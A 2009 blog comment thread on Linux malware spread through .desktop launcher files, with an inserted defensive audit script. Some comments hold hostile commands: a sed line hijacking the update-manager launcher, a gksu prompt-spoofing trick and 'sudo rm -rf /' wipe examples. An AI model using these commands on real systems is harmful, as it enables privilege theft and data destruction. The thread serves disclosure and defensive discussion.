Security vulnerabilities (buffer overflow, this or that) always will exist, Windows, Linux, FreeBSD, OS X, it doesn't matter. Often, the published vulnerability list for Linux includes those of the many available or bundled apps, while those for Windows only include those of the core OS, that should also be taken into account. Linux security is much better than it appears in that respect.

I'm still of the opinion that a switch to Linux will greatly enhance everyone's security and reduce the amount of concerns that they have to have about malware. However, as Linux users we cannot be complacent or rest on our laurels. Linux security is much better than that of Windows, we just have to make sure it stays that way.


Author's note by foobar, on 11-Feb-2009 09:22

@David F. Skoll: Hello David! Nice of you to stop by. :-)

Whether most clients save to the desktop is something I am actually not as sure about. I know mine do, they always do, but then: I possibly configured them to do that once and I just carried that config file with me. However, it doesn't make a difference for the effectiveness of this: Even if the client saves it specifically into a 'Downloads' directory (or some such place): If the user maneuvers to that directory using the Gnome or KDE file managers, the desktop environment will treat those launcher files the same way as if they were stored on the desktop itself. The user sees them without the '.desktop' extension and clicking it will launch the application as described in the 'Exec' line.

I know you like your root access, but honestly: I think it is overrated! Much damage can be done without it. But while not guaranteed to succeed 100% of the time, what I proposed in the appendix on how to get root should work many times.


Comment by notavir, on 11-Feb-2009 09:42

This is not a virus. For something to be classified as a virus it needs to be self-replicating to other machines and without user interaction. What you have created here is a malicious script, which relies on the user's stupidity, aka a trojan horse.


Comment by mjcpk, on 11-Feb-2009 09:59

I think in many ways the root idea is a hangover from old school viruses. Before people had worked out ways to make serious money from malware a virus was often created for fun and mischief. As a result we had viruses that messed with boot sectors, formatted hard drives and generally messed with the OS.

Nowadays, as you point out, there are lots of more useful things you can do without root. Root is important on servers ( not least so that you can cover your tracks ) but in a desktop environment you can do more than enough harm.


Comment by Bryan Short, on 11-Feb-2009 10:02

Interesting article and I agree for the most part. While Linux is inherently more secure, it is not immune to virus/malware.

One issue that you weakly touch on but fail to really address is the persistence issue. Sure there can be a self-executing script added to the $Autostart dirs, but again it is very easy to spot changes here. Writing virus protection software to monitor any malware adding entries to $Autostart would not require too much time or effort. Thereby killing any persistence issues. Granted, no such malware detection exists currently.

The issue really is, if you in Windows stumble upon a malware containing site, you are infected without any user interaction and probably in a way that is very difficult to detect and clean. In Linux it is not the case due to the executable issue. Your root exploit is interesting and worrying. It worries me that in the future we will be met with attacks using Flashplayer or java which could then implement your kdsu/sudo attack. That will be difficult to detect for a normal/average user.

Nevertheless, I enjoyed your article.


Author's note by foobar, on 11-Feb-2009 10:11

@notavir: Thank you for your comment. Yes, the old-school definition of a virus is specific, however, as I pointed out in the reply to another comment:

As far as the virus/trojan differentiation is concerned: I am aware of that. Having been in the security industry for some number of years, I also know that the press has hopelessly muddled that distinction. While there used to be a differentiation based on whether the malware required human interaction or not, whether it was taking advantage of a vulnerability or user-stupidity, etc. ... all those useful distinctions have been lost or messed up. Thus, I just stuck with the nowadays 'generic' name: Virus. Note that I wrote "they hardly deserve that name".

And a commenter on reddit said:

Actual viruses went out with the floppy. They were the first common form of malware on PCs, so the defensive software was named for them, but executable infection is such an inefficient transmission vector that absolutely no one bothers anymore. The word "virus" is now nothing more than a more familiar, less clumsy synonym for "malware," encompassing worms, trojans, spyware, and those irritating-but-unnamed things that sneak in through browser exploits.

I had mentioned in the article that I am describing how to write the code that infects and installs autostart. I also mention (without giving code): ...it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email.


Comment by freddie, on 11-Feb-2009 11:29

ok...so now I'm back (had to register before being able to ask a question :) so since it's easy to create a virus in ubuntu, how can it be protected other than running clamtk and not clicking on "nude chicks" through an email? I just installed ubuntu 8.10 yesterday and when trying to compare it to vista, I'll go ubuntu any day! But the command line is still mostly greek to me.

thanks
freddie


Author's note by foobar, on 11-Feb-2009 12:13

@freddie: As long as you are running Gnome or KDE you will have to be careful with saving attachments and then clicking on them. If you click on them inside of the email client you are still safe for now. Also, take a look at the actual name of the attachment in your email client BEFORE you save it to disk. If it ends with '.desktop' then you have to be suspicious.

Frankly, there is currently not much of a threat here, but it's just a good habit to check the name of the attachment before saving.


Comment by nzsouthernman, on 11-Feb-2009 12:58

Well put & well written dissertation. Keep it up.


Comment by Jonas, on 11-Feb-2009 14:22

"If the user maneuvers to that directorory using the Gnome or KDE file managers, the desktop environment will treat those launcher files the same way as if they were stored on the desktop itself. The user sees them without the '.desktop' extension and clicking it will launch the application as described in the 'Exec' line."

Not necessarily. I don't have access to a Gnome-based or KDE3.x system right now so can't verify how it works there, but your approach would hit a snag on a KDE4 system. A small snag to be sure, but still.

The .desktop ending is only hidden when the file is viewed at the desktop-level. If I were to have a .desktop file in ~/Desktop, and entered that directory using the filemanager I would still see the ending of the file. Moreover, if the "preview" mode is turned on it would look like a normal text-file instead of whatever the icon-part tells it to look like.

Still, probably wouldn't stop a user intent on being fooled...(especially since most non-technical users would know what a .desktop file is in the first place) and yes, I agree desktop files should be required to have the execute flag set.


Comment by ropers, on 11-Feb-2009 15:18

(0) Minor typos: The package manager is called synaptic, not synaptics (as you spelled it some of the time above). You may want to fix that.

(1) What you wrote about getting root above relies on messing with /usr/share/applications/synaptic.desktop. That constitutes a chicken and egg problem, because:

$ touch /usr/share/applications/synaptic.desktop

touch: cannot touch `/usr/share/applications/synaptic.desktop': Permission denied

However, all is not lost. At least in Ubuntu, users appear to have a ~/.local/share/applications/ directory, possibly opening the door to something like this:

sed -i 's:/usr/bin/update-manager:echo pwned!|wall:g' ~/.local/share/applications/update-manager.desktop

I suspect that this folder, like .desktop files themselves, may be a Freedesktop.org standard (cf. http://en.wikipedia.org/wiki/Freedesktop). (Freedesktop.org may also be the right guys to talk to in order to fix this correctly by requiring execute permissions for .desktop files, as you suggested.)

Also, I wonder if it may still be possible to tell the system to just execute a custom program in lieu of a system binary. If so, then one could go straight for the jugular and try to convince the system to execute an own script instead of gksu/gksudo by defining an alias (aliases take precedence, as "which" can verify). If one could source whatever alias definitions one has changed so that they also apply to all of the user's already currently running sessions/terminals, then I suspect that the next time gksu/gksudo is called, the attacker should be in business. The fact that many systems such as Ubuntu quite regularly run their update manager and prompt the user to update, and call gksudo in the course of such an update installation may even work in the attacker's favour.
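
The override above, and the autostart persistence point Bryan Short raised earlier in the thread, are both things a user can audit for. The following script is an added example, not code from the original post or from any commenter: it reports user-local launchers in the ~/.local/share/applications directory that shadow a system launcher of the same name with a different Exec= line, and autostart launchers whose Exec= points into the home directory or /tmp or contains shell metacharacters. The directory layout, launcher names and Exec lines in build_sample_tree are constructed for the demo; the real paths it assumes are $HOME/.local/share/applications, $HOME/.config/autostart and /usr/share/applications.

```shell
#!/bin/sh
# Added example (not from the original post or its commenters): audit the
# per-user launcher locations for (1) user-local .desktop files shadowing a
# system launcher with a different Exec= line and (2) autostart launchers
# whose Exec= line looks like a dropped payload. Directories are parameters
# so the same functions run against a constructed tree or the real one.

# Print the value of the first Exec= key in a .desktop file.
desktop_exec() {
    sed -n 's/^Exec=//p' "$1" | head -n 1
}

# Usage: find_overrides USER_DIR SYS_DIR
# One OVERRIDE line per user launcher that shadows a system launcher of the
# same name with a different Exec=; returns 1 if anything was found.
find_overrides() {
    user_dir=$1 sys_dir=$2 hits=0
    for f in "$user_dir"/*.desktop; do
        [ -e "$f" ] || continue
        name=$(basename "$f")
        [ -e "$sys_dir/$name" ] || continue   # does not shadow anything
        u=$(desktop_exec "$f")
        s=$(desktop_exec "$sys_dir/$name")
        if [ "$u" != "$s" ]; then
            echo "OVERRIDE $name system='$s' user='$u'"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Usage: check_autostart AUTOSTART_DIR HOME_DIR
# One SUSPECT line per autostart launcher whose Exec= contains shell
# metacharacters or runs something under HOME_DIR or /tmp; returns 1 if
# anything was found. A string heuristic, not proof that a launcher is benign.
check_autostart() {
    dir=$1 home=$2 hits=0
    for f in "$dir"/*.desktop; do
        [ -e "$f" ] || continue
        e=$(desktop_exec "$f")
        reason=""
        case $e in
            *[';|&<>']*|*'$('*|*'`'*) reason="shell-metachar" ;;
        esac
        case $e in
            "$home"/*|*" $home"/*|/tmp/*|*" /tmp/"*)
                reason="${reason:+$reason,}exec-under-home-or-tmp" ;;
        esac
        if [ -n "$reason" ]; then
            echo "SUSPECT $(basename "$f") [$reason] Exec=$e"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Constructed sample tree (stand-ins for /usr/share/applications, the user's
# ~/.local/share/applications, ~/.config/autostart and $HOME). Prints its path.
build_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/sys" "$t/user" "$t/autostart" "$t/home/.hidden"
    printf '[Desktop Entry]\nName=Update Manager\nExec=/usr/bin/update-manager\nType=Application\n' \
        > "$t/sys/update-manager.desktop"
    printf '[Desktop Entry]\nName=Synaptic\nExec=gksu /usr/sbin/synaptic\nType=Application\n' \
        > "$t/sys/synaptic.desktop"
    cp "$t/sys/synaptic.desktop" "$t/user/synaptic.desktop"   # identical copy: no finding
    printf '[Desktop Entry]\nName=Update Manager\nExec=echo pwned!|wall\nType=Application\n' \
        > "$t/user/update-manager.desktop"                     # shadowing copy, Exec replaced
    printf '[Desktop Entry]\nName=Network Manager\nExec=nm-applet\nType=Application\n' \
        > "$t/autostart/nm-applet.desktop"
    printf '[Desktop Entry]\nName=Nude Chicks\nExec=%s/.hidden/payload.sh\nType=Application\n' "$t/home" \
        > "$t/autostart/nude-chicks.desktop"                   # payload in a hidden drop dir
    echo "$t"
}

case ${1:-} in
    --demo)   # run against the constructed tree, then remove it
        T=$(build_sample_tree)
        find_overrides "$T/user" "$T/sys" || true
        check_autostart "$T/autostart" "$T/home" || true
        rm -rf "$T" ;;
    --audit)  # run against the real per-user locations
        find_overrides "$HOME/.local/share/applications" /usr/share/applications || true
        check_autostart "$HOME/.config/autostart" "$HOME" || true ;;
esac
```

Run it with --demo to see one OVERRIDE line (the replaced update-manager Exec) and one SUSPECT line (the launcher pointing into the hidden directory), or with --audit against the real directories. Note the limits: find_overrides only sees user launchers that reuse a system launcher's file name, a launcher under a fresh name is invisible to it, and a launcher the user customised deliberately will show up as an override, so the Exec lines it prints are what to read, not the hit count.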


Comment by David F. Skoll, on 11-Feb-2009 16:00

*sigh* I've confirmed that Thunar (the XFCE file manager) hides the .desktop extension and runs the desktop command by default when you click on the icon.

Ditto Nautilus, the GNOME file browser.

Konqueror doesn't hide the .desktop extension, but it does execute the command.

Congratulations, "Integrated Desktop" developers. You have just managed to recreate one of the worst design flaws of Windows: The encoding of file metadata ("executableness") in the file name (".desktop")

Well, it's a good thing I'm a grumpy old UNIX type who likes X because I can have lots of terminals open. No "file managers" or "desktop environments" for me, thanks.


Author's note by foobar, on 11-Feb-2009 16:26

@ropers:Actually, I know that you can't write to /usr/share/applications/. However, as I pointed out in my article, ~/.local/share/applications is exactly the place where you would write your own definition in order to overwrite the system default.

Maybe you missed that? But I did mention that in the article already.


Author's note by foobar, on 11-Feb-2009 16:28

@David F. Skoll: Yes, Thunar hides the .desktop extension as well. However, if you have saved this file (I tried from within Thunderbird as well as Firefox) Thunar somehow figures out that this is not quite legit. In that respect it manages to protect users better than the Gnome and KDE file managers.

However, I haven't tried creating the launcher file by hand. Maybe if manually created Thunar doesn't quite catch the problem?


Comment by Michael H., on 11-Feb-2009 16:56

I really hate the "Linux has a lower market share" myth.

Don't forget how many servers run Linux and how important those services are: Wikipedia, Facebook, Google, NYSE, TSX, Chrysler, IBM (develops it), Intel (develops for it and uses it internally), etc.

Don't you think if a virus was able to successfully propagate to these servers there would be more damage done than on some user's PC?


Comment by friends of the one law, on 11-Feb-2009 17:46

An outstanding article of high merit indeed.

One point, however, invites closer scrutiny:

"However, there is nothing fundamental about the architecture of Linux that prevents user stupidity or ignorance..."

There exists one aspect in which linux passively discriminates against 'user stupidity or ignorance'. [This doesn't 'prevent' user deficient characteristics - it merely fences out those less competent from using linux to begin with.]

The installation and/or maintenance of a basic linux desktop requires a level of knowledge _and_ intellect somewhat more developed than that required for a basic Micro$oft product.

Micro$oft specifically designs their products toward the lowest_common_denominator intellect in order to maximize their market $hare.

Nothing wrong with that approach (in a business geared toward global domination) of course.

This means that any moron who knows how to read, write, and count to nine on his fingers can install Window$ and operate it as an OS.

That is specifically what net criminals count upon. There is inordinately more money more easily had poaching from the seething masses too dumb to use linux than there is by spending endless hours developing reticulated malware to exploit the desktop of those who have at the least a linux OS and more than likely (by habit and disposition) have additional safeguards (such as differentiated data storage) and probably not much worth stealing or wrecking anyway.

linux is not a guarantee of security but being competent enough to use it is almost in itself a higher measure of some note.

linux (the OSes) lacks the lower_common_denominator impetus Micro$oft has (with the notable exceptions of Ubuntu and, to some lesser extent, RedHat which are somewhat 'dumbed down' in favor of market share). linux software (again with the notable exceptions of Gnome and to a lesser degree KDE) is far less friendly to noobs and stray experimentation. Many packages require not just knowledge but an almost MENSA-level intellectual ability to solve problems in order to be able to use them. Not all, just the ones you desperately need. (need we mention drivers?)

Still, the main points of the article deserves more attention than given by the Ubuntu/Redhat respondents mentioned.

That a virus/trojan can 0wn your system means we who use linux need to raise the bar just a bit higher to avoid the vulnerabilities usually associated with Micro$oft.

x


Comment by seriouslycgi, on 11-Feb-2009 19:03

One thing you pointed out was a logger to gain root. In gnome and kde when the user needs administrative rights it freezes the desktop and pops up a password prompt, what happens here? Is there a security mechanism that prevents anything but the application to know what's being typed? Or is it just for show? It would be a good idea if there could be a security feature where no shell can "sudo" or "su" unless you opened it from the desktop with a launcher and that password prompt coming up, locking the desktop, and all user applications (including your malware), encrypting the keystrokes at the lowest level (so a logger can't capture it while it's frozen :S ), and all this if you are in any desktop environment or X. This would limit the attack to only the user but put inconvenience a little bit ahead, and if there was a key logger they wouldn't get root (in this respect sudo is not safer). In some distros I've seen the launcher for a root terminal that freezes the desktop. Make this the only way to get su or sudo in a D.E and the machine is safe from key loggers. I think pretty much nothing can be done to prevent a user from installing/executing their own virus/script apart from attachment scanner and real time scanning of executables and scripts, this is why I left windows, and I don't execute unless I know what it is.


Comment by David F. Skoll, on 12-Feb-2009 00:57

@foobar: I suspect Thunar looks at the "exec=" line and won't start the program if it "looks" funny. Because I tried with a legitimate .desktop file and it launched without incident.

Trying to tell heuristically which desktop files are dangerous and which are not is an exercise in futility. I e-mailed the security contacts at kde.org, gnome.org and xfce.org. Let's see how seriously they take this.

By the way: In my May, 2002 article, I wrote:

"There is a trend under Linux to build complex, rich desktop environments which allow rich interaction between programs. These environments could, if not designed correctly, increase the chances for viruses to execute and propagate. So far, however, the designers of these environments seem to be following sensible design and security procedures. No-one, for example, has built a Linux e-mail client which automatically executes an attachment with just one mouse click."

I guess it's time to delete the last two sentences in that paragraph. :-(


Comment by David F. Skoll, on 12-Feb-2009 01:00

One more thing: This whole fiasco could have been avoided (plus countless lines of code in Konqueror/Nautilus/Thunar saved) if the format of a .desktop file had been:

#!/usr/bin/desktop-launch
[rest-of-file-here]

Then you'd just chmod +x the file and file managers wouldn't have to do anything special with it. One of my gripes about KDE and (especially) GNOME is that they almost delight in ignoring decades of UNIX heritage. "Small tools that do one thing well" no longer seems in vogue. :-(


Comment by Sanjaya Yogi, on 12-Feb-2009 02:16

A very interesting post! How about a challenge for everyone, take the opposite approach, and propose step by step "hardening" of the linux host to prevent this type of attack.

I think a whole blog of types of security attacks and their respective defensive counterparts...

Any ideas or links?


Comment by The Open Sourcerer, on 12-Feb-2009 02:18

Thanks for this. It is a very well thought through piece. And something that definitely needs to be looked at upstream by the desktop projects. I will probably cover this on my blog later too.

One way of limiting your vulnerability to "root" attacks is to never run your normal desktop user as the user in the sudoers file. I have two accounts on my Ubuntu PCs. One is my daily working user - no admin/sudo access. The other is just for performing updates and admin tasks etc.


Comment by diddy, on 12-Feb-2009 03:07

I installed wine and then got a friend (network manager) to email me over 100 meg of viruses from his repository.

I then double clicked on each one trying to run them but not with much luck

I kept getting errors like 'unable to find kernel32.sys' etc errors.

Needless to say my cpu usage went to about 70% but none on my contact list got hit and no files were damaged on my pc.

How boring was that, Why should windows users have all of the fun ?

Still I am glad that I tried it out.

For reference purposes I used viruses like Nimda, sobig etc

did I have antivirus software installed..... nope !


Comment by Felice, on 12-Feb-2009 03:20

Sorry, but I find the whole story pointless. There will never be any protection against the user's stupidity, and given some stupidity for granted, there are much less complicated ways of damaging a computer.

You can just prepare a professional looking web page and offer a very interesting .deb or .rpm package to be downloaded and installed. For instance a special codec to see a short video in an unusual format.

If the description is clever enough, the stupid will install, and BANG!

Are we only and exclusively installing packages from the official distribution page ? Me not, I would never copy an attachment from "somebody" to my desktop and open it, but I could easily try an interesting utility from the so called "community". Even if distributed as source code. (Do we all carefully read and understand a 100k C source before compiling ?)

On the other side, Linux is very different from Windows in that you cannot easily and silently infect a PC just passing by a malicious web page while surfing. This is the REAL danger, what works underground without your intervention at all. From this point of view, I feel quite safe.

About my percentage of casual user-stupidity, like deleting important files, formatting the wrong partition, downloading a cosy utility etc etc, I simply take it into account. For such cases, only a good and multi-stage backup system can protect my PC from myself.


Comment by Diego L Espiñeira, on 12-Feb-2009 03:27

In my opinion, the root of the problem is in the combination between software and people beliefs.

Source code and software changes a lot faster than the people beliefs and conceptions.


Comment by Phil, on 12-Feb-2009 03:46

You seem to have gone through a lot of trouble and explanation for nothing unless there is something I'm not thinking about.

Your attack is based on the idea that a person will foolishly click on something or follow the instructions in an email. If the user is that naive then why do you need all these methods to attempt to mask what you are doing? This same user would most likely save and click a .DEB or .RPM, enter their password if requested and let it install. They don't know what it's doing. I remember also seeing the web .DEB install that lets you click on a link in a web page and go straight into the package manager. An HTML email would accomplish this. Or why bother tricking them with a launcher. Simply put in the email that they must right click and check the make executable box on the permissions tab. That's no different than the instructions that tell you to click run in Windows or click the yellow bar at the top of IE.

It really does seem that this article goes out of the way to try and find some covert attack methods just to say Linux is not secure when there are much simpler ways to accomplish the same task. Any system that allows someone to execute something can be hacked. In essence the system is only doing what you asked it to do. There aren't many ways for it to determine that this is not what you really wanted it to do except for asking and even then a user can continue to say yes due to lack of understanding or a burning drive to see the nude photos. If you ask a computer to install malware then it will.

However I still believe that Linux may be better suited to deal with this issue though it can never completely be eradicated. For instance wouldn't it be simple to fix the launcher issue by forcing them to respect file permissions and not execute a script that is not set to be executable? But even still you will always have the stupid user that will go and make the script executable. Once again a computer will do what it's told.

I'd also like to know how well SELinux and AppArmor are able to protect against these types of issues. They are hard to configure now but what if standard profiles were kept in repositories and updated as new malware threats are discovered.


Comment by Maternitus, on 12-Feb-2009 03:51

Thank you for this interesting article. I have used Linux for quite some time (7 years) and I know that there are viruses for Linux. And lots of them.

Years ago I read an article about the virus subject and the author totalled the amounts of viruses that were known for every OS (and appeared just that year).

Linux won, but after that, rather depressing, list the author also explained why that was. A lot of viruses for Linux are made just to test out the weak spots, in order to improve them and make them resistant to it. From that perspective I just felt more secure, because I knew that in the Linux community the reaction speed to fix any vulnerability is high.

But anyway, I never understood how such a thing was made and it taught me some insight on the workings of the OS. It will help me using the software in a better and even more responsible way.

Thanks again.

Maternitus.

PS Before I switched 7 years ago, it was Windows that slowed down my machines, so as a second nature I still never open any attachments from email, except the mails from those I trust... In that way Windows can be a good thing, how evil it even may sound. ;-)


Comment by Caleb Cushing, on 12-Feb-2009 03:58

All this is true, but linux does have some advantages... in linux viruses are easier to clean up, at least if they don't get root. that wouldn't make them any less pesky for users... but a tech would have less problems cleaning them up.

A /tmp virus can be prevented by making a separate /tmp partition and making it noexec. Actually... I think... it might be possible to mount /home as noexec. I should try it and see if I have any problems.


Comment by Pablo Manuel Rizzo, on 12-Feb-2009 04:01

jajaja! That's not a virus!


Comment by CT, on 12-Feb-2009 04:14

Nice article, but it's a bit late, don't you think? For the last 10+ years the rumor of "no Linux virus" has continued. If you can script and know the ins and outs of the Desktop GUI, then you can create bugs easily. The key, as you mention, is that the core (the OS itself) is separate, and therefore more secure. And so on ...

Anyway, this a well written piece and I do think that new users need to be reminded constantly to not turn a blind eye to security.


Comment by Charly G., on 12-Feb-2009 04:37

Just wondering... why e-mail clients don't issue some kind of warning when an attachment has multiple dots in its name? It doesn't solve the problem, but at least gives a little more awareness.


Comment by s.plisskin, on 12-Feb-2009 04:43

So basically he is saying Gnu/Linux can be infected if the user bends over backwards to allow it to infect his system by running through several hoops to accomplish.

Anyone this stupid deserves to be infected.


Comment by hoho, on 12-Feb-2009 05:33

wow what a virus, i wrote a new one:

enter irc #ubuntu channel and tell a newbie:

write in a console

echo "im going to see a nude woman"; sudo rm -rf /


Comment by ken, on 12-Feb-2009 05:44

Nice! You have just done what the news today tells Al Qaeda! Exactly how they can bring down the US.

So why not you tell how we can bring down linux.

Anybody using linux that really understands will then know this will be the perfect breeding ground to launch and receive from. Far easier than writing one for windows. You don't need to be root and you don't need 5 easy steps. Those who know will tell you 1 step is all you need. You say that can't be? Think again.

All these linux distro's will then have the sheet pulled right from underneath them

Trust me, its just that easy. so easy that all it will take is just 1 person with enough nerve to follow through. Or one person to discuss it........


Comment by lalan, on 12-Feb-2009 05:52

Great article!

I think that someone who tells that he never thought that Linux is "virus/malware/trojan" free is lying.

I think that KDE control center or kpackage for example have a great approach to deal with "gksu stuff". They call the KDEsu from the app only when you need root privileges. Doing this you cannot insert the script to run as root.

Despite this, it's true that root privileges are not the only way to make some trouble, totally agree.


Author's note by foobar, on 12-Feb-2009 06:27

@David F. Skoll: I like the idea with #!/usr/bin/desktop-launch. Very *nix-ish. Or at least execute bits.


Author's note by foobar, on 12-Feb-2009 06:29

@The Opensourcerer: About not running your normal desktop user in the sudoers file. Good idea! Sadly just not the default in a popular distro like Ubuntu. And of course that still doesn't protect you from being infected (on the user level), since you don't really need root.


Author's note by foobar, on 12-Feb-2009 06:35

@Felice and @Phil: You are both suggesting that what I am describing here is overly complicated and that instead a user could be infected by a well-written .deb or .rpm file that is offered for download on a web-site. How did that user get to the web-site, though? An email with a link in it? Anyway...

You are both missing the point.

In order to install anything on Linux you will need root or at least sudo. Thus, any attempt to do this will prompt you for your password. It is also easily rendered useless by a properly managed security policy within a large enterprise, whereby desktop users are not in the sudoers file. Instantly, your entire .deb and .rpm based scheme fails.

What I outlined here does not require ANY sudo or root privileges in order to still successfully infect a machine (or at least a user's account). The discussion about getting the root password was moved into an appendix, since it is not relevant for the working of the actual infection.


Author's note by foobar, on 12-Feb-2009 06:37

@Caleb Cushing: Linux does not only have 'some' advantages, it has many!

But making /tmp noexec isn't important and also doesn't prevent anything. See in the step-by-step guide? There the bash commands create the drop-directory first within the user's directory, so /tmp is not needed at all.


Author's note by foobar, on 12-Feb-2009 06:39

@ken: So, not telling is better than disclosing? That's called 'security through obscurity' and it doesn't work...


Author's note by foobar, on 12-Feb-2009 06:42

@Pablo Manuel Rizzo: Jajaja! We know all that! Please consider some of the other comments about that topic.


Comment by David F. Skoll, on 12-Feb-2009 06:55

So... it turns out this attack was pointed out by Jon Corbet in 2006: http://lwn.net/Articles/178409/

Unfortunately, the desktop environment developers ignored that and chose convenience over security. I guess they were just copying Micro$oft.


Comment by whatever, on 12-Feb-2009 07:06

Launch a file by association? Wow... You are brilliant. /sarcasm... You are about 15 years behind...All of these can be turned off.


Author's note by foobar, on 12-Feb-2009 07:26

@David F. Skoll: Yes, I had just found out about that myself. See the 'update' notice I added at the end of my article.


Comment by Mackenzie, on 12-Feb-2009 07:43

Well jeez, might as well just send an email that says:

"forward this message to 10 people then do 'sudo rm -rf /' and you'll get 10 years good luck!"

And claim that's a virus too.

Most Linux desktops are not as stupid as Windows desktops. They don't have a mail server running on the box, so how would it procreate again?

And by the way....talking about viruses and yet you require Javascript? Seriously? Anyone even remotely security-conscious knows Javascript is something you don't want to have enabled.


Comment by Mackenzie, on 12-Feb-2009 07:49

Also, this would be a trojan not a virus. Viruses are written by people that have found real remote exploits. Trojans are written by those who give up on finding a remote exploit and resort to social engineering.


Comment by Mackenzie, on 12-Feb-2009 07:51

Maternitus:

Those are Proof of Concept viruses. They were never in the wild. The total count for in the wild viruses for Linux is less than 30, I believe. They also have an average infection rate of something like 20 machines.


Comment by bud freeman, on 12-Feb-2009 08:23

(yawn) Another supposed, self-professed security professional who claims that he knows the difference between a malicious script and a virus, but since the media has muddied the waters, you can perpetuate the confusion, too.

That attitude speaks volumes towards your credibility as an expert in security.

(yawn) As more people adopt Linux, the bad guys will be more likely to target Linux.

As more people adopt Linux, its security is more likely to be improved, since it's open source, and its flaws are more likely to be discovered and fixed (since there are more bad guys than good guys)

Here's a script, 2 lines, that if you can trick someone on any Linux system, with passwordless sudo, to run, that will wipe their system:

#!/bin/bash
sudo rm -rf /*

Which begs the question:

So what?

At the end of the day, you're saying that Linux is not secure because you can fool people?

(yawn)

cheers,


Comment by Flimm, on 12-Feb-2009 09:41

It's worse than that. You can make gksu tell you it's running a program when it's actually running another.

$ echo "[Desktop Entry]" > ~/fake.desktop

$ echo "Name=/usr/sbin/synaptic" >> ~/fake.desktop

$ gksu --desktop ~/fake.desktop virus

The last command would only tell you:

The application '/usr/sbin/synaptic' lets you modify essential parts of your system.

Insert that command into synaptic.desktop, and a user would never notice the difference until too late.


Author's note by foobar, on 12-Feb-2009 10:04

@bud freeman: Sorry, but you are the one who is boring here.

Firstly, the point of the article is that the user does NOT need to know how to start a shell or set execute bit. The non-technical users who are vulnerable here don't know how to do that! Did you miss that completely obvious point, which most other readers instantly understood?

Secondly, you can comment on my credibility as a security expert (which I never claimed I was) all you want. Until you are able to get a simple point like the one above - or actually read the full article - you are the one without credibility, since you are appearing very dense indeed.

Get off my lawn!


Author's note by foobar, on 12-Feb-2009 10:07

@Mackenzie: As mentioned earlier: Telling people in an email to open their terminal and type stuff, and expecting them to know how to do this, is not going to help your attack. Firstly, your example sucks because it assumes that people properly know how to order this: FIRST send out the emails, THEN erase your own hard drive. Think about the details, please.

Also, before commenting, please read the entire article. If you would have done that, you would have discovered that I am explicitly addressing this 'most Linux users are not as stupid as Windows users' argument.

Come back once you have read that, please.


Comment by TripleII, on 12-Feb-2009 10:27

You don't know what a Virus is. A virus is a piece of software that installs, propagates/replicates on a user's system with no user intervention through a security exploit in a program or the underlying OS itself.

http://en.wikipedia.org/wiki/Computer_virus

A computer virus is a computer program that can copy itself and infect a computer without the permission or knowledge of the user.

You have outlined a possible way to more easily write "malware" which requires user intervention, and as outlined a whole host of conditions, etc. You should update your title though, this is as much a virus as "hit your own head with a hammer" is a stealth way to get the user to be hurt.

TripleII


Comment by TripleII, on 12-Feb-2009 10:45

And to be fair, on Windows, where people do a disservice mixing and matching Virus with Malware/Trojan with Spyware all rolled into a "Virus" as if they are all the same results in an inability of users to prevent infections. A very large percentage of "Viruses" on Windows are actually malware programs, but since they are called Viruses, they NEVER LEARN that it wasn't a deficiency in AVG but their own unwitting installation of the trojan.

You may pooh pooh this as a silly distinction but I have known users who actually BELIEVE that their AV scanner means they can install anything since, if it is Virus infected, their AV program will detect it and they are fine. Since it's all "A Virus" (when discussing the entire spectrum of online threats) they are free to "do anything" as long as Norton is up to date.

Now, whether you can see the above or not, and you do create very valid points in malware production, Geeks need to be technically accurate.



TripleII


Author's note by foobar, on 12-Feb-2009 11:04

@TripleII: Read my response to your comment in the follow up [ http://www.geekzone.co.nz/foobar/6236 ] , please.


Author's note by foobar, on 12-Feb-2009 11:07

@s.plisskin and @hoho: You are not getting the point: The article describes how a user can be infected WITHOUT bending over backwards and without having to know how to start a shell.

How many times do I have to repeat that? Any step that you can take away from the infection makes it easier and more successful. Non-technical users don't know how to run the shell, so this here is definitely making an infection easier.

My goodness, people. Wake up!


Comment by SPM, on 12-Feb-2009 12:27

You are talking about trojans here not viruses. The problem with viruses on Linux (or Unix or Mac or BSD for that matter) is that there aren't any that have been successful at replicating in the wild - EVER. Not a single one. Of course that is not an excuse for complacency.

The bottom line though: the proof of the pudding is in the eating.


Comment by Shane Kerns, on 12-Feb-2009 13:05

Nice introductory article on the security issues of Linux. I have been a Linux junkie for over a dozen years now (self proclaimed of course) and I must admit that you make very valid points. Although you must have realized that whatever you have mentioned here is a function of user ignorance.

What you should focus on is the fact that MS products are more susceptible due to the fact that they can execute any code or executable as any user. Their kernel is built that way.

No one suggests that Linux is 100% virus or trojan or malware free. To make my point let's say that half the servers in the world ran XP/Vista servers and half the world ran Linux servers (pick your distro and make each group as secure as you possibly can), now which half do you think would be hacked first and what do you think would be the time lag between the 2 groups?

My guess (and personal experience) is that it would take about a week longer to break the security of a Linux server.

People say there are far more personal computers running some Windows OS than there are people running a Linux OS which is why more Windows PCs are hacked, but what do you have to say about the server side. The opposite is true when it comes to servers yet more Windows servers are hacked. Why do you think that is?


Comment by oiaohm, on 12-Feb-2009 13:43

Ok someone missed a protection. .desktop file through email client is quite simple to prevent. Filtering.

Thanks for a great article. Mind considering get it included in this http://www.linuxsecurity.com/resource_files/documentation/virus-writing-HOWTO/_html/index.html .

It's basically a reference document that is used when designing Linux security.


Author's note by foobar, on 12-Feb-2009 13:53

@oiaohm: Actually, please see the follow up: The .desktop extension is not strictly necessary for this to work.

Sure, please feel free to include a link to the article in the virus-writing-HOWTO.


Comment by roger, on 12-Feb-2009 18:11

Why is it so damn hard to make a virus infect a desktop machine? I lost interest before barely reading through half of the article! It sounds so complicated.


Comment by Mackenzie, on 12-Feb-2009 20:31

@foobar:

I did read it. The point is, this is NOT A VIRUS! At least change the title to say "Linux trojan" so you're factually accurate!

Social engineering is not a technical problem. It is a human problem. This thus has nothing to do with the OS or desktop environment. I was trying to demonstrate that all you're doing is telling someone "please do something stupid for me" and hoping they comply.

Yeah yeah I saw the bit about Linux users being as stupid as Windows users. I'm not disputing that there are computer illiterate folks on every platform. Hell, my mom uses Linux. That's NOT the point though, because stupid users are not the OS's problem. Stupid users are their own problem. They'll end up as candidates for the Darwin Awards anyway.


Comment by Matias, on 12-Feb-2009 22:08

